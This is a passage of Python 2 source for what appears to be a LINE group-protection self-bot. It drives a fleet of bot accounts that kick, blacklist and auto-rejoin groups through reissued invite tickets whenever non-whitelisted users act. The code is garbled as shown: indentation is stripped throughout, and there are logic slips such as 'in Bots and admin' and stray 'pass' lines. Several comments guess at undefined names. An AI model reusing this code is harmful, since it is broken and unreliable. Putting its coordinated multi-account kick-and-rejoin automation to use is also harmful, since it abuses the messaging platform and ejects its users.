mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name + datetime.now().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・" + Name + " ツ"
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
if msg.from_ in wait2["ROM"][msg.to]:
del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = ks.getGroup(op.param1)
except:
try:
G = kt.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
ks.updateGroup(G)
except:
try:
kt.updateGroup(G)
except:
pass
if op.param2 in Bots: # 'ken' was undefined; assumed to mean the bot whitelist
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kt.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 13:
if op.param3 in mid:
if op.param2 in Amid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
X = kd.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
if op.param3 in Dmid:
if op.param2 in Emid:
X = ke.getGroup(op.param1)
X.preventJoinByTicket = False
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
if op.param3 in Emid:
if op.param2 in mid:
X = kf.getGroup(op.param1)
X.preventJoinByTicket = False
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
#=====================================================================================
if op.param3 in mid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Cmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Dmid:
X = ks.getGroup(op.param1)
X.preventJoinByTicket = False
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Emid:
X = kt.getGroup(op.param1)
X.preventJoinByTicket = False
kt.updateGroup(X)
Ti = kt.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kt.updateGroup(X)
Ti = kt.reissueGroupTicket(op.param1)
#======================================================
if op.param3 in Bmid:
if op.param2 in mid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
G = kc.getGroup(op.param1)
G.preventJoinByTicket = False
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Dmid:
G = ks.getGroup(op.param1)
G.preventJoinByTicket = False
ks.updateGroup(G)
Ticket = ks.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ks.updateGroup(G)
Ticket = ks.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Emid:
G = kt.getGroup(op.param1)
G.preventJoinByTicket = False
kt.updateGroup(G)
Ticket = kt.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
kt.updateGroup(G)
Ticket = kt.reissueGroupTicket(op.param1)
#=========================================================================
if op.type == 15:
if wait["autorein"] == True:
if op.param2 in admin:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
kicker.inviteIntoGroup(op.param1,[op.param2])
#===========================================
if op.type == 32:
if op.param2 not in Bots and op.param2 not in admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("\x1e",',') # assume invitee mids in param3 are 0x1e-separated
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if Amid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki.rejectGroupInvitation(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("\x1e",',') # assume invitee mids in param3 are 0x1e-separated
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
ki.cancelGroupInvitation(op.param1, matched_list)
if Bmid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kk.rejectGroupInvitation(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kk.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("\x1e",',') # assume invitee mids in param3 are 0x1e-separated
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
kk.cancelGroupInvitation(op.param1, matched_list)
if Cmid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kc.rejectGroupInvitation(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kc.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("\x1e",',') # assume invitee mids in param3 are 0x1e-separated
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
kc.cancelGroupInvitation(op.param1, matched_list)
if op.type == 17:
if op.param3 in wait["blacklist"]:
if op.param2 not in Bots and op.param2 not in admin:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
cl.sendText(op.param1,"blacklist users are not allowed to sign in -_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param3}
cl.sendMessage(c)
if op.type == 17:
if wait["welcomemsg"] == True:
if op.param2 not in Bots:
ginfo = cl.getGroup(op.param1)
cl.sendText(op.param1,cl.getContact(op.param2).displayName + wait["welmsg"]+ str(ginfo.name))
if op.type == 11:
if not op.param2 in Bots:
if wait["qr"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
except Exception, e:
print e
if op.type == 11:
if op.param2 not in Bots and op.param2 not in admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
kicker.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = True
kicker.updateGroup(G)
cl.sendText(op.param1,"please do not open link group-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
except Exception, e:
print e
if op.type == 13:
G = cl.getGroup(op.param1)
I = G.creator
if op.param2 not in Bots and op.param2 not in admin:
if wait["protectionOn"] == True:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
if G is not None:
gInviMids = [contact.mid for contact in G.invitee]
kicker.cancelGroupInvitation(op.param1, gInviMids)
kicker.kickoutFromGroup(op.param1,[op.param2])
cl.sendText(op.param1,"you are prohibited from inviting-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 11:
if wait["pelaku"] == True:
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 13:
if wait["pelaku"] == True:
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 19:
if wait["pelaku"] == True:
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
print "mnunjukan plaku"
if op.type == 15:
if op.param2 in admin:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param2])
if op.type == 19:
if op.param2 in Bots:
if op.param3 in admin:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
if op.type == 19:
if not op.param2 in Bots:
if op.param3 in admin:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.type == 19:
if not op.param2 in Bots:
try:
gs = ki.getGroup(op.param1)
gs = kk.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if op.param2 not in Bots and op.param2 not in admin:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.param2 not in Bots and op.param2 not in admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = False
kicker.updateGroup(G)
invsend = 0
Ticket = kicker.reissueGroupTicket(op.param1)
kl.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.2)
X = kicker.getGroup(op.param1)
X.preventJoinByTicket = True
kl.kickoutFromGroup(op.param1,[op.param2])
kicker.kickoutFromGroup(op.param1,[op.param2])
kl.leaveGroup(op.param1)
kicker.updateGroup(X)
except Exception, e:
print e
if op.param2 not in Bots and op.param2 not in admin:
try:
gs = ki.getGroup(op.param1)
gs = kk.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if op.param2 not in Bots and op.param2 not in admin:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki.getGroup(op.param1)
X.preventJoinByTicket = True
ki.updateGroup(X)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kk.getGroup(op.param1)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ticket = kk.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
kd.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kd.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kc.getGroup(op.param1)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
ke.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ke.getGroup(op.param1)
X.preventJoinByTicket = False
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kd.getGroup(op.param1)
X.preventJoinByTicket = True
kd.updateGroup(X)
Ticket = kd.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
kf.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kf.getGroup(op.param1)
X.preventJoinByTicket = False
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = ke.getGroup(op.param1)
X.preventJoinByTicket = True
ke.updateGroup(X)
Ticket = ke.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
#========================================================================
if Fmid in op.param3:
if op.param2 in Bots and admin:
pass
try:
kg.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kg.getGroup(op.param1)
X.preventJoinByTicket = False
kg.updateGroup(X)
Ti = kg.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kf.getGroup(op.param1)
X.preventJoinByTicket = True
kf.updateGroup(X)
Ticket = kf.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Gmid in op.param3:
if op.param2 in Bots:
pass
try:
kh.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kh.getGroup(op.param1)
X.preventJoinByTicket = False
kh.updateGroup(X)
Ti = kh.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kg.getGroup(op.param1)
X.preventJoinByTicket = True
kg.updateGroup(X)
Ticket = kg.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Hmid in op.param3:
if op.param2 in Bots:
pass
try:
kj.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kj.getGroup(op.param1)
X.preventJoinByTicket = False
kj.updateGroup(X)
Ti = kj.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kh.getGroup(op.param1)
X.preventJoinByTicket = True
kh.updateGroup(X)
Ticket = kh.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Jmid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ti = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kj.getGroup(op.param1)
X.preventJoinByTicket = True
kj.updateGroup(X)
Ticket = kj.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Nmid in op.param3:
if op.param2 in Bots:
pass
try:
ko.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ko.getGroup(op.param1)
G.preventJoinByTicket = False
ko.updateGroup(G)
Ti = ko.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
